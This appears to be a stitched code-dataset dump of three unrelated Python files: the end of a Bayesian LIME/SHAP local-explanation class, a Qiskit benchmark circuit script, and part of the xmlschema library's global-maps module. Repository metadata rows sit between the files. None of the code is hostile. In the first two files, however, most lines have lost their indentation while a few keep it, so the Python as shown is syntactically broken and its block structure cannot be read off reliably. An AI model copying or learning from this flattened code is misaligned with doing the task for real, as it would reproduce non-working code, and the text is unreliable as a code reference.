current_n_perturbations += new_perturbations[0].shape[0]
if self.verbose:
pbar.update(new_perturbations[0].shape[0])
return current_perturbations
def lime_tabular_focus_sample(self,
data,
classifier_f,
label,
n_samples,
focus_sample_batch_size,
focus_sample_initial_points,
to_consider=10_000,
                                  temperature=5e-4,
existing_data=[]):
"""Focus sample n_samples perturbations for lime tabular."""
current_n_perturbations = 0
# Get initial focus sampling batch
if len(existing_data) < focus_sample_initial_points:
# If there's existing data, make sure we only sample up to existing_data points
initial_perturbations = self._lime_tabular_perturb_n_samples(data, focus_sample_initial_points - len(existing_data))
current_perturbations = self._stack_tabular_return(existing_data, initial_perturbations)
else:
current_perturbations = existing_data
if self.verbose:
pbar = tqdm(total=n_samples)
        current_perturbations = list(current_perturbations)
        current_n_perturbations += current_perturbations[LDATA].shape[0]
        # Store predictions on initial data
        current_perturbations.append(classifier_f(current_perturbations[LINVERSE])[:, label])
        if self.verbose:
            pbar.update(current_n_perturbations)
# Sample up to n_samples
while current_n_perturbations < n_samples:
# If batch size would exceed n_samples, only sample enough to reach n_samples
current_batch_size = min(focus_sample_batch_size, n_samples - current_n_perturbations)
# Init current BLR
blr = BayesianLinearRegression(percent=self.cred_int)
# Get weights on current distances
weights = self._lime_kernel(current_perturbations[LDISTANCES], self.width)
# Fit blr on current perturbations & data
blr.fit(current_perturbations[LDATA], current_perturbations[LY], weights)
# Get set of perturbations to consider labeling
candidate_perturbations = self._lime_tabular_perturb_n_samples(data, to_consider)
_, var = blr.predict(candidate_perturbations[LDATA])
# Reweight
            var /= temperature
            exp_var = np.exp(var)
            all_exp = np.sum(exp_var)
            temperature_scaled_weights = exp_var / all_exp
            # Get sampled indices
            least_confident_sample = np.random.choice(len(var), size=current_batch_size, p=temperature_scaled_weights, replace=False)
# Get predictions
cy = classifier_f(candidate_perturbations[LINVERSE][least_confident_sample])[:, label]
new_perturbations = self._select_indices_from_data(candidate_perturbations, least_confident_sample, cy)
current_perturbations = self._stack_tabular_return(current_perturbations, new_perturbations)
current_n_perturbations += new_perturbations[0].shape[0]
if self.verbose:
pbar.update(new_perturbations[0].shape[0])
return current_perturbations
def _lime_kernel(self, d, kernel_width):
return np.sqrt(np.exp(-(d ** 2) / kernel_width ** 2))
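    # The expression above matches LIME's default exponential kernel,
    # sqrt(exp(-d^2 / kernel_width^2)), applied to Euclidean distances.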
def _explain_bayes_lime(self,
data,
classifier_f,
label,
focus_sample,
cred_width,
n_samples,
max_n_samples,
focus_sample_batch_size,
focus_sample_initial_points,
ptg_initial_points,
to_consider):
"""Computes the bayeslime tabular explanations."""
# Case where only n_samples is specified and not focused sampling
if n_samples is not None and not focus_sample:
logging.info("Generating bayeslime explanation with %s samples", n_samples)
# Generate perturbations
rdata, inverse, scaled_data, distances = self._lime_tabular_perturb_n_samples(data, n_samples)
weights = self._lime_kernel(distances, self.width)
y = classifier_f(inverse)[:, label]
blr = BayesianLinearRegression(percent=self.cred_int)
blr.fit(rdata, y, weights)
# Focus sampling
elif focus_sample:
logging.info("Starting focused sampling")
if n_samples:
logging.info("n_samples preset, running focused sampling up to %s samples", n_samples)
logging.info("using batch size %s with %s initial points", focus_sample_batch_size, focus_sample_initial_points)
focused_sampling_output = self.lime_tabular_focus_sample(data,
classifier_f,
label,
n_samples,
focus_sample_batch_size,
focus_sample_initial_points,
to_consider=to_consider,
existing_data=[])
rdata = focused_sampling_output[LDATA]
distances = focused_sampling_output[LDISTANCES]
y = focused_sampling_output[LY]
blr = BayesianLinearRegression(percent=self.cred_int)
weights = self._lime_kernel(distances, self.width)
blr.fit(rdata, y, weights)
else:
# Use ptg to get the number of samples, then focus sample
# Note, this isn't used in the paper, this case currently isn't implemented
raise NotImplementedError
else:
# PTG Step 1, get initial
rdata, inverse, scaled_data, distances = self._lime_tabular_perturb_n_samples(data, ptg_initial_points)
weights = self._lime_kernel(distances, self.width)
y = classifier_f(inverse)[:, label]
blr = BayesianLinearRegression(percent=self.cred_int)
blr.fit(rdata, y, weights)
# PTG Step 2, get additional points needed
n_needed = int(np.ceil(blr.get_ptg(cred_width)))
if self.verbose:
tqdm.write(f"Additional Number of perturbations needed is {n_needed}")
ptg_rdata, ptg_inverse, ptg_scaled_data, ptg_distances = self._lime_tabular_perturb_n_samples(data, n_needed - ptg_initial_points)
ptg_weights = self._lime_kernel(ptg_distances, self.width)
rdata = np.concatenate((rdata, ptg_rdata), axis=0)
inverse = np.concatenate((inverse, ptg_inverse), axis=0)
scaled_data = np.concatenate((scaled_data, ptg_scaled_data), axis=0)
distances = np.concatenate((distances, ptg_distances), axis=0)
# Run final model
ptgy = classifier_f(ptg_inverse)[:, label]
y = np.concatenate((y, ptgy), axis=0)
blr = BayesianLinearRegression(percent=self.cred_int)
blr.fit(rdata, y, self._lime_kernel(distances, self.width))
# Format output for returning
output = {
"data": rdata,
"y": y,
"distances": distances,
"blr": blr,
"coef": blr.coef_,
"max_coefs": None # Included for consistency purposes w/ bayesshap
}
return output
def _get_shap_weights(self, data, M):
"""Gets shap weights. This assumes data is binary."""
nonzero = np.count_nonzero(data, axis=1)
weights = []
for nz in nonzero:
denom = (nCk(M, nz) * nz * (M - nz))
# Stabilize kernel
if denom == 0:
weight = 1.0
else:
weight = ((M - 1) / denom)
weights.append(weight)
return weights
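    # For reference, the weight computed above is the standard Kernel SHAP kernel
    #   w(z) = (M - 1) / (C(M, |z|) * |z| * (M - |z|)),
    # which diverges for the empty and full coalitions; the ``denom == 0`` guard
    # clamps those cases to a weight of 1.0 instead.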
def _enumerate_initial_shap(self, data, max_coefs=None):
"""Enumerate 1's for stability."""
if max_coefs is None:
data = np.eye(data.shape[0])
inverse = self.shap_info.discretizer.undiscretize(data)
return data, inverse
else:
data = np.zeros((max_coefs.shape[0], data.shape[0]))
for i in range(max_coefs.shape[0]):
data[i, max_coefs[i]] = 1
inverse = self.shap_info.discretizer.undiscretize(data)
return data[:, max_coefs], inverse
def _explain_bayes_shap(self,
data,
classifier_f,
label,
focus_sample,
cred_width,
n_samples,
max_n_samples,
focus_sample_batch_size,
focus_sample_initial_points,
ptg_initial_points,
to_consider,
feature_select_num_points=1_000,
n_features=10,
l2=True,
enumerate_initial=True,
feature_selection=True,
max_coefs=None):
"""Computes the bayesshap tabular explanations."""
if feature_selection and max_coefs is None:
n_features = min(n_features, data.shape[0])
_, feature_select_inverse = self._shap_tabular_perturb_n_samples(data, feature_select_num_points)
lr = Ridge().fit(feature_select_inverse, classifier_f(feature_select_inverse)[:, label])
max_coefs = np.argsort(np.abs(lr.coef_))[-1 * n_features:]
elif feature_selection and max_coefs is not None:
pass
else:
max_coefs = None
# Case without focused sampling
if n_samples is not None and not focus_sample:
logging.info("Generating bayesshap explanation with %s samples", n_samples)
# Enumerate single coalitions, if requested
if enumerate_initial:
data_init, inverse_init = self._enumerate_initial_shap(data, max_coefs)
n_more = n_samples - inverse_init.shape[0]
else:
n_more = n_samples
rdata, inverse = self._shap_tabular_perturb_n_samples(data, n_more, max_coefs)
if enumerate_initial:
rdata = np.concatenate((data_init, rdata), axis=0)
inverse = np.concatenate((inverse_init, inverse), axis=0)
y = classifier_f(inverse)[:, label]
weights = self._get_shap_weights(rdata, M=rdata.shape[1])
blr = BayesianLinearRegression(percent=self.cred_int)
blr.fit(rdata, y, weights)
elif focus_sample:
if feature_selection:
raise NotImplementedError
logging.info("Starting focused sampling")
if n_samples:
logging.info("n_samples preset, running focused sampling up to %s samples", n_samples)
logging.info("using batch size %s with %s initial points", focus_sample_batch_size, focus_sample_initial_points)
focused_sampling_output = self.shap_tabular_focus_sample(data,
classifier_f,
label,
n_samples,
focus_sample_batch_size,
focus_sample_initial_points,
to_consider=to_consider,
enumerate_initial=enumerate_initial)
rdata = focused_sampling_output[SDATA]
y = focused_sampling_output[SY]
weights = self._get_shap_weights(rdata, rdata.shape[1])
blr = BayesianLinearRegression(percent=self.cred_int, l2=l2)
blr.fit(rdata, y, weights)
else:
# Use ptg to get the number of samples, then focus sample
# Note, this case isn't used in the paper and currently isn't implemented
raise NotImplementedError
else:
# Use PTG to get initial samples
            # Enumerate initial points if requested
if enumerate_initial:
data_init, inverse_init = self._enumerate_initial_shap(data, max_coefs)
n_more = ptg_initial_points - inverse_init.shape[0]
else:
n_more = ptg_initial_points
# Perturb using initial samples
rdata, inverse = self._shap_tabular_perturb_n_samples(data, n_more, max_coefs)
if enumerate_initial:
rdata = np.concatenate((data_init, rdata), axis=0)
inverse = np.concatenate((inverse_init, inverse), axis=0)
# Get labels
y = classifier_f(inverse)[:, label]
# Fit BLR
weights = self._get_shap_weights(rdata, M=rdata.shape[1])
blr = BayesianLinearRegression(percent=self.cred_int, l2=l2)
blr.fit(rdata, y, weights)
# Compute PTG number needed
n_needed = int(np.ceil(blr.get_ptg(cred_width)))
ptg_rdata, ptg_inverse = self._shap_tabular_perturb_n_samples(data,
n_needed - ptg_initial_points,
max_coefs)
if self.verbose:
tqdm.write(f"{n_needed} more samples needed")
rdata = np.concatenate((rdata, ptg_rdata), axis=0)
inverse = np.concatenate((inverse, ptg_inverse), axis=0)
ptgy = classifier_f(ptg_inverse)[:, label]
weights = self._get_shap_weights(rdata, M=rdata.shape[1])
            # Run final model (ptgy was computed above; avoid a redundant second classifier call)
y = np.concatenate((y, ptgy), axis=0)
blr = BayesianLinearRegression(percent=self.cred_int, l2=l2)
blr.fit(rdata, y, weights)
# Format output for returning
output = {
"data": rdata,
"y": y,
"distances": weights,
"blr": blr,
"coef": blr.coef_,
"max_coefs": max_coefs
}
return output
def explain(self,
data,
classifier_f,
label,
cred_width=1e-2,
focus_sample=True,
n_samples=None,
max_n_samples=10_000,
focus_sample_batch_size=2_500,
focus_sample_initial_points=100,
ptg_initial_points=200,
to_consider=10_000,
feature_selection=True,
n_features=15,
tag=None,
only_coef=False,
only_blr=False,
enumerate_initial=True,
max_coefs=None,
l2=True):
"""Explain an instance.
        As opposed to other model-agnostic explanations, the bayes explanations
        accept a credible interval width instead of a number-of-perturbations
        value.
        If the credible interval level is set to 95% (the default), the bayesian
        explanations will generate feature importances that lie within
        +/- width/2 of their reported means 95% of the time.
Arguments:
data: The data instance to explain
classifier_f: The classification function. This function should return
probabilities for each label, where if there are M labels
and N instances, the output is of shape (N, M).
label: The label index to explain.
            cred_width: The width of the credible interval of the resulting explanation.
                        Note, this serves as an upper bound in the implementation; the
                        final credible intervals may be tighter because PTG is a bit
                        approximate. Also, be aware that for kernelshap the requested
                        width may not be binding if we can compute the kernelshap
                        values exactly by enumerating all the coalitions.
focus_sample: Whether to use uncertainty sampling.
            n_samples: If specified, n_samples will override the width setting
                       and compute the explanation with n_samples perturbations.
max_n_samples: The maximum number of samples to use. If the width is set to
a very small value and many samples are required, this serves
as a point to stop sampling.
focus_sample_batch_size: The batch size of focus sampling.
focus_sample_initial_points: The number of perturbations to collect before starting
focused sampling.
            ptg_initial_points: The number of perturbations to collect before computing the ptg estimate.
to_consider: The number of perturbations to consider in focused sampling.
feature_selection: Whether to do feature selection using Ridge regression. Note, currently
only implemented for BayesSHAP.
n_features: The number of features to use in feature selection.
            tag: A tag to attach to the explanation.
only_coef: Only return the explanation means.
only_blr: Only return the bayesian regression object.
enumerate_initial: Whether to enumerate a set of initial shap coalitions.
l2: Whether to fit with l2 regression. Turning off the l2 regression can be useful for the shapley value estimation.
Returns:
explanation: The resulting feature importances, credible intervals, and bayes regression
object.
"""
assert isinstance(data, np.ndarray), "Data must be numpy array. Note, this means that classifier_f \
must accept numpy arrays."
self._log_args(locals())
if self.kernel == "lime" and self.data in ["tabular", "image"]:
output = self._explain_bayes_lime(data,
classifier_f,
label,
focus_sample,
cred_width,
n_samples,
max_n_samples,
focus_sample_batch_size,
focus_sample_initial_points,
ptg_initial_points,
to_consider)
elif self.kernel == "shap" and self.data in ["tabular", "image"]:
output = self._explain_bayes_shap(data,
classifier_f,
label,
focus_sample,
cred_width,
n_samples,
max_n_samples,
focus_sample_batch_size,
focus_sample_initial_points,
ptg_initial_points,
to_consider,
feature_selection=feature_selection,
n_features=n_features,
enumerate_initial=enumerate_initial,
max_coefs=max_coefs,
l2=l2)
        else:
            raise NotImplementedError(
                f"Unsupported kernel/data combination: {self.kernel}/{self.data}")
output['tag'] = tag
if only_coef:
return output['coef']
if only_blr:
return output['blr']
return output
def nCk(n, r):
"""n choose r
From: https://stackoverflow.com/questions/4941753/is-there-a-math-ncr-function-in-python"""
r = min(r, n-r)
numer = reduce(op.mul, range(n, n-r, -1), 1)
denom = reduce(op.mul, range(1, r+1), 1)
return numer / denom
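# Quick sanity check (illustrative): nCk(5, 2) == 10.0. Note the function uses
# true division, so it returns a float even when the value is integral.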
def do_exp(args):
"""Supporting function for the explanations."""
i, data, init_kwargs, exp_kwargs, labels, max_coefs, pass_args = args
def do(data_i, label):
if pass_args is not None and pass_args.balance_background_dataset:
init_kwargs['training_data'] = np.concatenate((data_i[None, :], np.zeros((1, data_i.shape[0]))), axis=0)
exp = BayesLocalExplanations(**init_kwargs)
exp_kwargs['tag'] = i
exp_kwargs['label'] = label
if max_coefs is not None:
exp_kwargs['max_coefs'] = max_coefs[i]
e = deepcopy(exp.explain(data_i, **exp_kwargs))
return e
if labels is not None:
return do(data[i], labels[i])
else:
return do(data[i], exp_kwargs['label'])
def explain_many(all_data, init_kwargs, exp_kwargs, pool_size=1, verbose=False, labels=None, max_coefs=None, args=None):
"""Parallel explanations."""
with Pool(pool_size) as p:
if verbose:
results = list(tqdm(p.imap(do_exp, [(i, all_data, init_kwargs, exp_kwargs, labels, max_coefs, args) for i in range(all_data.shape[0])])))
else:
results = p.map(do_exp, [(i, all_data, init_kwargs, exp_kwargs, labels, max_coefs, args) for i in range(all_data.shape[0])])
return results
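# A minimal usage sketch (illustrative, not part of the original module). The
# constructor keyword `training_data` is taken from do_exp above; the kernel
# and data settings mirror the self.kernel / self.data attributes checked in
# explain(), but verify the constructor signature earlier in this file before
# relying on these exact names:
#
#   clf = LogisticRegression().fit(X_train, y_train)   # e.g. sklearn
#   exp = BayesLocalExplanations(training_data=X_train)
#   out = exp.explain(data=X_train[0], classifier_f=clf.predict_proba,
#                     label=1, cred_width=0.05)
#   means, posterior = out["coef"], out["blr"]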
| 46.679487
| 149
| 0.552534
|
9725f01c84e8e91867f491b3ee192d682eaa79e8
| 4,153
|
py
|
Python
|
benchmark/startQiskit_Class974.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
benchmark/startQiskit_Class974.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
benchmark/startQiskit_Class974.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
# qubit number=5
# total number=43
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
    # NOTE: use U1 gate (P gate) with lambda = pi (i.e., 180 degrees) ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
oracle = QuantumCircuit(controls, name="Zf")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.h(controls[n])
if n >= 2:
oracle.mcu1(pi, controls[1:], controls[0])
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
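# Note on the oracle construction above: for each bitstring with f(rep) == "1",
# the X gates map that basis state to |11...1>, the multi-controlled phase
# (mcu1 with angle pi) applies a -1 phase to |11...1>, and the X gates undo the
# mapping, so the net effect is the phase oracle O_f|x> = (-1)^f(x) |x>.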
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[0]) # number=3
prog.h(input_qubit[1]) # number=4
prog.h(input_qubit[2]) # number=5
prog.h(input_qubit[3]) # number=6
prog.h(input_qubit[4]) # number=21
Zf = build_oracle(n, f)
repeat = floor(sqrt(2 ** n) * pi / 4)
for i in range(1):
prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=33
prog.cz(input_qubit[1],input_qubit[0]) # number=34
prog.h(input_qubit[0]) # number=35
prog.rx(-0.7822565707438585,input_qubit[2]) # number=31
prog.x(input_qubit[0]) # number=29
prog.cx(input_qubit[1],input_qubit[0]) # number=30
prog.h(input_qubit[1]) # number=40
prog.cz(input_qubit[0],input_qubit[1]) # number=41
prog.h(input_qubit[1]) # number=42
prog.x(input_qubit[1]) # number=26
prog.cx(input_qubit[0],input_qubit[1]) # number=27
prog.cx(input_qubit[0],input_qubit[2]) # number=22
prog.x(input_qubit[2]) # number=23
prog.cx(input_qubit[0],input_qubit[2]) # number=24
prog.x(input_qubit[3]) # number=12
if n>=2:
prog.mcu1(pi,input_qubit[1:],input_qubit[0])
prog.x(input_qubit[0]) # number=13
prog.x(input_qubit[1]) # number=14
prog.x(input_qubit[2]) # number=15
prog.x(input_qubit[3]) # number=16
prog.h(input_qubit[0]) # number=17
prog.h(input_qubit[3]) # number=37
prog.cz(input_qubit[2],input_qubit[3]) # number=38
prog.h(input_qubit[3]) # number=39
prog.h(input_qubit[1]) # number=18
prog.h(input_qubit[2]) # number=19
prog.rx(2.5761059759436304,input_qubit[3]) # number=32
prog.h(input_qubit[3]) # number=20
prog.h(input_qubit[0])
prog.h(input_qubit[1])
prog.h(input_qubit[2])
prog.h(input_qubit[3])
# circuit end
return prog
if __name__ == '__main__':
key = "00000"
f = lambda rep: str(int(rep == key))
prog = make_circuit(5,f)
backend = BasicAer.get_backend('statevector_simulator')
sample_shot =7924
info = execute(prog, backend=backend).result().get_statevector()
qubits = round(log2(len(info)))
info = {
np.binary_repr(i, qubits): round((info[i]*(info[i].conjugate())).real,3)
for i in range(2 ** qubits)
}
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_Class974.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| 30.992537
| 80
| 0.603419
|
61011d5080e6c3b2ac3ef75ee603735d39ddfa02
| 16,621
|
py
|
Python
|
xmlschema/validators/globals_.py
|
jhermann/xmlschema
|
4251afc21b9ce254edcb75d0b11fe936b206a7d0
|
[
"MIT"
] | null | null | null |
xmlschema/validators/globals_.py
|
jhermann/xmlschema
|
4251afc21b9ce254edcb75d0b11fe936b206a7d0
|
[
"MIT"
] | null | null | null |
xmlschema/validators/globals_.py
|
jhermann/xmlschema
|
4251afc21b9ce254edcb75d0b11fe936b206a7d0
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright (c), 2016-2018, SISSA (International School for Advanced Studies).
# All rights reserved.
# This file is distributed under the terms of the MIT License.
# See the file 'LICENSE' in the root directory of the present
# distribution, or http://opensource.org/licenses/MIT.
#
# @author Davide Brunato <brunato@sissa.it>
#
"""
This module contains functions and classes for managing namespaces'
XSD declarations/definitions.
"""
from __future__ import unicode_literals
import re
from ..exceptions import XMLSchemaKeyError, XMLSchemaTypeError, XMLSchemaValueError
from ..namespaces import XSD_NAMESPACE
from ..qnames import XSD_INCLUDE, XSD_IMPORT, XSD_REDEFINE, XSD_NOTATION, XSD_SIMPLE_TYPE, \
XSD_COMPLEX_TYPE, XSD_GROUP, XSD_ATTRIBUTE, XSD_ATTRIBUTE_GROUP, XSD_ELEMENT, XSD_ANY_TYPE
from ..helpers import get_qname, local_name, prefixed_to_qname
from ..namespaces import NamespaceResourcesMap
from . import XMLSchemaNotBuiltError, XsdValidator, XsdKeyref, XsdComponent, XsdAttribute, \
XsdSimpleType, XsdComplexType, XsdElement, XsdAttributeGroup, XsdGroup, XsdNotation
from .builtins import xsd_builtin_types_factory
def camel_case_split(s):
"""
Split words of a camel case string
"""
return re.findall(r'[A-Z]?[a-z]+|[A-Z]+(?=[A-Z]|$)', s)
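# Illustrative examples of the split above: camel_case_split('XMLSchema')
# yields ['XML', 'Schema'] and camel_case_split('attributeGroup') yields
# ['attribute', 'Group'], which iterchildren_by_tag below joins and lowercases
# into names such as 'iterfind_xsd_attribute_groups'.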
def iterchildren_by_tag(tag):
"""
    Defines a generator that produces all child elements that have a specific tag.
"""
def iterfind_function(elem):
for e in elem:
if e.tag == tag:
yield e
iterfind_function.__name__ = str('iterfind_xsd_%ss' % '_'.join(camel_case_split(local_name(tag))).lower())
return iterfind_function
iterchildren_xsd_import = iterchildren_by_tag(XSD_IMPORT)
iterchildren_xsd_include = iterchildren_by_tag(XSD_INCLUDE)
iterchildren_xsd_redefine = iterchildren_by_tag(XSD_REDEFINE)
#
# Defines the load functions for XML Schema structures
def create_load_function(filter_function):
def load_xsd_globals(xsd_globals, schemas):
redefinitions = []
for schema in schemas:
target_namespace = schema.target_namespace
for elem in iterchildren_xsd_redefine(schema.root):
for child in filter_function(elem):
qname = get_qname(target_namespace, child.attrib['name'])
redefinitions.append((qname, (child, schema)))
for elem in filter_function(schema.root):
qname = get_qname(target_namespace, elem.attrib['name'])
try:
xsd_globals[qname].append((elem, schema))
except KeyError:
xsd_globals[qname] = (elem, schema)
except AttributeError:
xsd_globals[qname] = [xsd_globals[qname], (elem, schema)]
for qname, obj in redefinitions:
if qname not in xsd_globals:
elem, schema = obj
schema.parse_error("not a redefinition!", elem)
else:
try:
xsd_globals[qname].append(obj)
except KeyError:
xsd_globals[qname] = obj
except AttributeError:
xsd_globals[qname] = [xsd_globals[qname], obj]
return load_xsd_globals
load_xsd_simple_types = create_load_function(iterchildren_by_tag(XSD_SIMPLE_TYPE))
load_xsd_attributes = create_load_function(iterchildren_by_tag(XSD_ATTRIBUTE))
load_xsd_attribute_groups = create_load_function(iterchildren_by_tag(XSD_ATTRIBUTE_GROUP))
load_xsd_complex_types = create_load_function(iterchildren_by_tag(XSD_COMPLEX_TYPE))
load_xsd_elements = create_load_function(iterchildren_by_tag(XSD_ELEMENT))
load_xsd_groups = create_load_function(iterchildren_by_tag(XSD_GROUP))
load_xsd_notations = create_load_function(iterchildren_by_tag(XSD_NOTATION))
def create_lookup_function(xsd_classes):
if isinstance(xsd_classes, tuple):
types_desc = ' or '.join([c.__name__ for c in xsd_classes])
else:
types_desc = xsd_classes.__name__
def lookup(global_map, qname, tag_map):
try:
obj = global_map[qname]
except KeyError:
raise XMLSchemaKeyError("missing a %s object for %r!" % (types_desc, qname))
else:
if isinstance(obj, xsd_classes):
return obj
elif isinstance(obj, tuple):
# Not built XSD global component without redefinitions
try:
elem, schema = obj
except ValueError:
return obj[0] # Circular build, simply return (elem, schema) couple
try:
factory_or_class = tag_map[elem.tag]
except KeyError:
raise XMLSchemaKeyError("wrong element %r for map %r." % (elem, global_map))
global_map[qname] = obj, # Encapsulate into a single-item tuple to catch circular builds
global_map[qname] = factory_or_class(elem, schema, parent=None)
return global_map[qname]
elif isinstance(obj, list):
if not isinstance(obj[0], xsd_classes):
# Not built XSD global component with redefinitions
try:
elem, schema = obj[0]
except ValueError:
return obj[0][0] # Circular build, simply return (elem, schema) couple
try:
factory_or_class = tag_map[elem.tag]
except KeyError:
raise XMLSchemaKeyError("wrong element %r for map %r." % (elem, global_map))
global_map[qname] = obj[0], # To catch circular builds
global_map[qname] = factory_or_class(elem, schema, parent=None)
else:
# Built-in type
global_map[qname] = obj[0]
for elem, schema in obj[1:]:
global_map[qname].schema = schema
global_map[qname].elem = elem
return global_map[qname]
else:
raise XMLSchemaTypeError(
"wrong instance %s for XSD global %r, a %s required." % (obj, qname, types_desc)
)
return lookup
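# State machine implemented by the lookup above (summary, for readability): a
# plain (elem, schema) tuple means "loaded but not built"; a single-item tuple
# ((elem, schema),) marks a component currently being built, so re-entrant
# lookups during a circular build return the raw couple instead of recursing;
# a list carries redefinitions; and an XsdComponent instance is fully built.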
lookup_notation = create_lookup_function(XsdNotation)
lookup_type = create_lookup_function((XsdSimpleType, XsdComplexType))
lookup_attribute = create_lookup_function(XsdAttribute)
lookup_attribute_group = create_lookup_function(XsdAttributeGroup)
lookup_group = create_lookup_function(XsdGroup)
lookup_element = create_lookup_function(XsdElement)
class XsdGlobals(XsdValidator):
"""
Mediator class for related XML schema instances. It stores the global
declarations defined in the registered schemas. Register a schema to
    add its declarations to the global maps.
:param validator: the XMLSchema class to use for global maps.
:param validation: the XSD validation mode to use, can be 'strict', 'lax' or 'skip'.
"""
def __init__(self, validator, validation='strict'):
super(XsdGlobals, self).__init__(validation)
self.validator = validator
self.namespaces = NamespaceResourcesMap() # Registered schemas by namespace URI
self.types = {} # Global types (both complex and simple)
self.attributes = {} # Global attributes
self.attribute_groups = {} # Attribute groups
self.groups = {} # Model groups
self.notations = {} # Notations
self.elements = {} # Global elements
self.substitution_groups = {} # Substitution groups
self.constraints = {} # Constraints (uniqueness, keys, keyref)
self.global_maps = (self.notations, self.types, self.attributes,
self.attribute_groups, self.groups, self.elements)
def copy(self, validation=None):
"""Makes a copy of the object."""
obj = XsdGlobals(self.validator, validation or self.validation)
obj.namespaces.update(self.namespaces)
obj.types.update(self.types)
obj.attributes.update(self.attributes)
obj.attribute_groups.update(self.attribute_groups)
obj.groups.update(self.groups)
obj.notations.update(self.notations)
obj.elements.update(self.elements)
obj.substitution_groups.update(self.substitution_groups)
obj.constraints.update(self.constraints)
return obj
__copy__ = copy
def lookup_notation(self, qname):
return lookup_notation(self.notations, qname, self.validator.TAG_MAP)
def lookup_type(self, qname):
return lookup_type(self.types, qname, self.validator.TAG_MAP)
def lookup_attribute(self, qname):
return lookup_attribute(self.attributes, qname, self.validator.TAG_MAP)
def lookup_attribute_group(self, qname):
return lookup_attribute_group(self.attribute_groups, qname, self.validator.TAG_MAP)
def lookup_group(self, qname):
return lookup_group(self.groups, qname, self.validator.TAG_MAP)
def lookup_element(self, qname):
return lookup_element(self.elements, qname, self.validator.TAG_MAP)
@property
def built(self):
if not self.namespaces:
return False
xsd_global = None
for xsd_global in self.iter_globals():
if not isinstance(xsd_global, XsdComponent):
return False
if not xsd_global.built:
return False
if xsd_global is not None:
return True
else:
return False
@property
def validation_attempted(self):
if self.built:
return 'full'
elif any([schema.validation_attempted == 'partial' for schema in self.iter_schemas()]):
return 'partial'
else:
return 'none'
@property
def validity(self):
if not self.namespaces:
return False
if all(schema.validity == 'valid' for schema in self.iter_schemas()):
return 'valid'
elif any(schema.validity == 'invalid' for schema in self.iter_schemas()):
return 'invalid'
else:
return 'notKnown'
@property
def resources(self):
return [(schema.url, schema) for schemas in self.namespaces.values() for schema in schemas]
def iter_components(self, xsd_classes=None):
if xsd_classes is None or isinstance(self, xsd_classes):
yield self
for xsd_global in self.iter_globals():
for obj in xsd_global.iter_components(xsd_classes):
yield obj
def iter_schemas(self):
"""Creates an iterator for the schemas registered in the instance."""
for ns_schemas in self.namespaces.values():
for schema in ns_schemas:
yield schema
def iter_globals(self):
"""
Creates an iterator for XSD global definitions/declarations.
"""
for global_map in self.global_maps:
for obj in global_map.values():
yield obj
def register(self, schema):
"""
Registers an XMLSchema instance.
"""
try:
ns_schemas = self.namespaces[schema.target_namespace]
except KeyError:
self.namespaces[schema.target_namespace] = [schema]
else:
if schema in ns_schemas:
return
if not any([schema.url == obj.url for obj in ns_schemas]):
ns_schemas.append(schema)
def clear(self, remove_schemas=False, only_unbuilt=False):
"""
Clears the instance maps and schemas.
:param remove_schemas: removes also the schema instances.
:param only_unbuilt: removes only not built objects/schemas.
"""
if only_unbuilt:
not_built_schemas = {schema for schema in self.iter_schemas() if not schema.built}
if not not_built_schemas:
return
for global_map in self.global_maps:
for k in list(global_map.keys()):
obj = global_map[k]
if not isinstance(obj, XsdComponent) or obj.schema in not_built_schemas:
del global_map[k]
if k in self.substitution_groups:
del self.substitution_groups[k]
if k in self.constraints:
del self.constraints[k]
if remove_schemas:
namespaces = NamespaceResourcesMap()
for uri, value in self.namespaces.items():
for schema in value:
if schema not in not_built_schemas:
namespaces[uri] = schema
self.namespaces = namespaces
else:
for global_map in self.global_maps:
global_map.clear()
self.substitution_groups.clear()
self.constraints.clear()
if remove_schemas:
self.namespaces.clear()
def build(self):
"""
Update the global maps adding the global not built registered schemas.
"""
try:
meta_schema = self.namespaces[XSD_NAMESPACE][0]
except KeyError:
raise XMLSchemaValueError("%r: %r namespace is not registered." % (self, XSD_NAMESPACE))
not_built_schemas = [schema for schema in self.iter_schemas() if not schema.built]
for schema in not_built_schemas:
schema._root_elements = None
# Load and build global declarations
load_xsd_notations(self.notations, not_built_schemas)
load_xsd_simple_types(self.types, not_built_schemas)
load_xsd_attributes(self.attributes, not_built_schemas)
load_xsd_attribute_groups(self.attribute_groups, not_built_schemas)
load_xsd_complex_types(self.types, not_built_schemas)
load_xsd_elements(self.elements, not_built_schemas)
load_xsd_groups(self.groups, not_built_schemas)
if not meta_schema.built:
xsd_builtin_types_factory(meta_schema, self.types)
for qname in self.notations:
self.lookup_notation(qname)
for qname in self.attributes:
self.lookup_attribute(qname)
for qname in self.attribute_groups:
self.lookup_attribute_group(qname)
for qname in self.types:
self.lookup_type(qname)
for qname in self.elements:
self.lookup_element(qname)
for qname in self.groups:
self.lookup_group(qname)
# Builds element declarations inside model groups.
